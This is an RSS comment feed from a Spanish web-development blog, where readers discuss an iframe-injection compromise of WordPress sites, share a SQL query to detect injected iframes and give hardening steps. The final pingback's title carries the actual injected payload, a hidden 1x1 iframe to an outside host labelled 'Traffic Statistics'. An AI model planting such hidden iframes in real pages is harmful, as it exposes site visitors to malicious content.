<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comentarios en: Nuevo fallo en WordPress, insercción de iframe</title>
	<atom:link href="http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/</link>
	<description>Desarrollo web, Wordpress, y alguna cosilla más</description>
	<lastBuildDate>Sun, 12 Feb 2012 12:01:25 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>Por: paul</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-58468</link>
		<dc:creator>paul</dc:creator>
		<pubDate>Tue, 11 Aug 2009 19:57:25 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-58468</guid>
		<description>hola ya que estan tratando el tema del iframe estoy intentando isertar uno en una pagina de mi wordpress

el codigo es un buscador de innmuebles 
este es el codigo



y lo que me muestra al publicar la pagina es este codigo

src=”http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&amp;id_usuario_di=0″ name=”I1″&gt;

y no el buscador como tal en este enlace se ve el buscador de como se deberia ver correctamente

http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&amp;id_usuario_di=0

como logro hacerlo de la manera correcta

gracias de antemano</description>
		<content:encoded><![CDATA[<p>hola ya que estan tratando el tema del iframe estoy intentando isertar uno en una pagina de mi wordpress</p>
<p>el codigo es un buscador de innmuebles<br />
este es el codigo</p>
<p>y lo que me muestra al publicar la pagina es este codigo</p>
<p>src=”http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&amp;id_usuario_di=0″ name=”I1″&gt;</p>
<p>y no el buscador como tal en este enlace se ve el buscador de como se deberia ver correctamente</p>
<p><a href="http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&#038;id_usuario_di=0" rel="nofollow">http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&#038;id_usuario_di=0</a></p>
<p>como logro hacerlo de la manera correcta</p>
<p>gracias de antemano</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: cucoalmeria</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-53479</link>
		<dc:creator>cucoalmeria</dc:creator>
		<pubDate>Sat, 17 Jan 2009 20:30:27 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-53479</guid>
		<description>Por cierto utilizao wp 2.7 ultima versión.</description>
		<content:encoded><![CDATA[<p>Por cierto utilizao wp 2.7 ultima versión.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: cucoalmeria</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-53478</link>
		<dc:creator>cucoalmeria</dc:creator>
		<pubDate>Sat, 17 Jan 2009 20:30:05 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-53478</guid>
		<description>Hola a todos lleva varios dias intentanto limpiar mi blog, que me lo
han hackeado o algo parecido. Utilizo wordpress, he utilizado plugin
sploit scaner y me detecta varios iframes  o script maliciosos y me
indica en que carpeta estan. Accedo por ftp a dichas carpetas o
archivos, los edito los limpio y los vuelvo a subir hasta que queda
todo limpio. Pero al dia siguiente vuelve a salir, la mayoria estan en
los archivos index.

He quitado toda publicidad, el cambiado el theme y aún asi vuelve a
salir los dichosos codigos maliciosos por lo que google no me da el
visto bueno y dice que mi blog es un peligro.

He accedido a mi base de datos, en este tema estoy mas pegado. En el
buscador de la base de datos he intentado localizar los iframes pero
no los encuentra, no se si lo hago bien.

Lo curioso tambien es que se veo el codigo fuente de mis paginas, en
todas ellas salel dicho iframe al final de ellas.

Alguien tiene alguna solución, necesito ayuda por favor ?

gracias</description>
		<content:encoded><![CDATA[<p>Hola a todos lleva varios dias intentanto limpiar mi blog, que me lo<br />
han hackeado o algo parecido. Utilizo wordpress, he utilizado plugin<br />
sploit scaner y me detecta varios iframes  o script maliciosos y me<br />
indica en que carpeta estan. Accedo por ftp a dichas carpetas o<br />
archivos, los edito los limpio y los vuelvo a subir hasta que queda<br />
todo limpio. Pero al dia siguiente vuelve a salir, la mayoria estan en<br />
los archivos index.</p>
<p>He quitado toda publicidad, el cambiado el theme y aún asi vuelve a<br />
salir los dichosos codigos maliciosos por lo que google no me da el<br />
visto bueno y dice que mi blog es un peligro.</p>
<p>He accedido a mi base de datos, en este tema estoy mas pegado. En el<br />
buscador de la base de datos he intentado localizar los iframes pero<br />
no los encuentra, no se si lo hago bien.</p>
<p>Lo curioso tambien es que se veo el codigo fuente de mis paginas, en<br />
todas ellas salel dicho iframe al final de ellas.</p>
<p>Alguien tiene alguna solución, necesito ayuda por favor ?</p>
<p>gracias</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Claudia</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-49216</link>
		<dc:creator>Claudia</dc:creator>
		<pubDate>Fri, 01 Aug 2008 02:17:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-49216</guid>
		<description>igual fui atacada en esta pagina en wordpress 2.3.3 , e inclusive ya hasta google me bloqueó, la verdad tenia mucho tiempo de no actualizar la página y tenia carpetas con todos los permisos, realizcé la consulta que poponen en esta página : SELECT *  FROM `PREFIX_posts` WHERE `post_title` LIKE  &#039;%&lt;iframe%&#039;;

y me apareció un post, lo eliminé por supuesto, pero mi duda es: ¿es necesario que borre toda la página, base de datos, contraseñas de acceso a la base de datos, o que solo actualize la versión de wordpress, la pregunta es por cual versión?</description>
		<content:encoded><![CDATA[<p>igual fui atacada en esta pagina en wordpress 2.3.3 , e inclusive ya hasta google me bloqueó, la verdad tenia mucho tiempo de no actualizar la página y tenia carpetas con todos los permisos, realizcé la consulta que poponen en esta página : SELECT *  FROM `PREFIX_posts` WHERE `post_title` LIKE  &#8216;%&lt;iframe%&#8217;;</p>
<p>y me apareció un post, lo eliminé por supuesto, pero mi duda es: ¿es necesario que borre toda la página, base de datos, contraseñas de acceso a la base de datos, o que solo actualize la versión de wordpress, la pregunta es por cual versión?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Ruben</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-48711</link>
		<dc:creator>Ruben</dc:creator>
		<pubDate>Tue, 15 Jul 2008 14:38:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-48711</guid>
		<description>Estoy teniendo un problema parecido en mi Blog, aunque éste parece tener la intención de tumbar la web de MSN.com.

¿Alguien tiene mas información sobre lo sucedido?

http://www.entrecodigos.com/2008/07/inyeccion-de-iframe-en-wordpress.html</description>
		<content:encoded><![CDATA[<p>Estoy teniendo un problema parecido en mi Blog, aunque éste parece tener la intención de tumbar la web de MSN.com.</p>
<p>¿Alguien tiene mas información sobre lo sucedido?</p>
<p><a href="http://www.entrecodigos.com/2008/07/inyeccion-de-iframe-en-wordpress.html" rel="nofollow">http://www.entrecodigos.com/2008/07/inyeccion-de-iframe-en-wordpress.html</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Inyección de iframe en Wordpress &#124; Entre Códigos</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-48710</link>
		<dc:creator>Inyección de iframe en Wordpress &#124; Entre Códigos</dc:creator>
		<pubDate>Tue, 15 Jul 2008 14:23:16 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-48710</guid>
		<description>[...] por Google me encuentro con que Anieto ya se encontró un problema parecido hace unos meses, aunque tras leer por los foros de ayuda de wordpress veo que el problema era [...]</description>
		<content:encoded><![CDATA[<p>[...] por Google me encuentro con que Anieto ya se encontró un problema parecido hace unos meses, aunque tras leer por los foros de ayuda de wordpress veo que el problema era [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Rub</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-46091</link>
		<dc:creator>Rub</dc:creator>
		<pubDate>Fri, 18 Apr 2008 07:11:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-46091</guid>
		<description>Se sabe si para WP2.5 se ha solucionado? Puedo confirmar que en WP2.3.3 ocurre x-P</description>
		<content:encoded><![CDATA[<p>Se sabe si para WP2.5 se ha solucionado? Puedo confirmar que en WP2.3.3 ocurre x-P</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Jose Maria</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42936</link>
		<dc:creator>Jose Maria</dc:creator>
		<pubDate>Tue, 18 Dec 2007 21:31:52 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42936</guid>
		<description>Buenas noches a todos.
Nosotros tuvimos esa incidencia tanto en nuestra Home (sin wordpress) y en varias páginas de la instalación de Wordpress.
Es decir, es un exploit que se aprovecha de los permisos de escritura del Wordpress. 
Lo hemos solucionado de la siguiente forma:
1- Eliminando las entradas al &quot;iframe&quot; de todas las páginas (recuerden que no solo afecta a las páginas de wordpress, en nuestro caso tambien apareció dicha entrada en el &quot;index.html&quot; del dominio principal)
2- Proteger con contraseña el directorio &quot;wp-admin&quot;
3- Asegurar permisos &quot;chmod&quot;. En nuestro caso teníamos algunos ficheros con permisos de escritura innecesarios. Ahora todos nuestros directorios esta con 755 y ficheros 644.

Desde que hicimos estas modificaciones, no hemos vuelto a tener problemas. En especial, desde que protegimos con contraseña el directorio &quot;wp-admin&quot; y eliminamos los permisos de escritura en plugins (*.php y *css)

Un saludo a todos.</description>
		<content:encoded><![CDATA[<p>Buenas noches a todos.<br />
Nosotros tuvimos esa incidencia tanto en nuestra Home (sin wordpress) y en varias páginas de la instalación de WordPress.<br />
Es decir, es un exploit que se aprovecha de los permisos de escritura del WordPress.<br />
Lo hemos solucionado de la siguiente forma:<br />
1- Eliminando las entradas al &#8220;iframe&#8221; de todas las páginas (recuerden que no solo afecta a las páginas de wordpress, en nuestro caso tambien apareció dicha entrada en el &#8220;index.html&#8221; del dominio principal)<br />
2- Proteger con contraseña el directorio &#8220;wp-admin&#8221;<br />
3- Asegurar permisos &#8220;chmod&#8221;. En nuestro caso teníamos algunos ficheros con permisos de escritura innecesarios. Ahora todos nuestros directorios esta con 755 y ficheros 644.</p>
<p>Desde que hicimos estas modificaciones, no hemos vuelto a tener problemas. En especial, desde que protegimos con contraseña el directorio &#8220;wp-admin&#8221; y eliminamos los permisos de escritura en plugins (*.php y *css)</p>
<p>Un saludo a todos.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: hely rojas</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42325</link>
		<dc:creator>hely rojas</dc:creator>
		<pubDate>Tue, 27 Nov 2007 21:33:46 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42325</guid>
		<description>agregando un plugin que filtre palabras (groserias y cosas asi) se debiera corregir el fallo, solo seria agregar ciertos tags HTML como palabras prohibidas</description>
		<content:encoded><![CDATA[<p>agregando un plugin que filtre palabras (groserias y cosas asi) se debiera corregir el fallo, solo seria agregar ciertos tags HTML como palabras prohibidas</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: &#60;!&#8211; Traffic Statistics &#8211;&#62; &#60;iframe src=&#8221;http://www.wp-stats-php.info/iframe/wp-stats.php&#8221; frameborder=&#8221;0&#8243; height=&#8221;1&#8243; width=&#8221;1&#8243;&#62;&#60;/iframe&#62; &#60;!&#8211; End Traffic Statistics &#821</title>
		<link>http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42308</link>
		<dc:creator>&#60;!&#8211; Traffic Statistics &#8211;&#62; &#60;iframe src=&#8221;http://www.wp-stats-php.info/iframe/wp-stats.php&#8221; frameborder=&#8221;0&#8243; height=&#8221;1&#8243; width=&#8221;1&#8243;&#62;&#60;/iframe&#62; &#60;!&#8211; End Traffic Statistics &#821</dc:creator>
		<pubDate>Tue, 27 Nov 2007 14:27:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42308</guid>
		<description>[...] http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/ [...]</description>
		<content:encoded><![CDATA[<p>[...] <a href="http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/" rel="nofollow">http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/</a> [...]</p>
]]></content:encoded>
	</item>
</channel>
</rss>

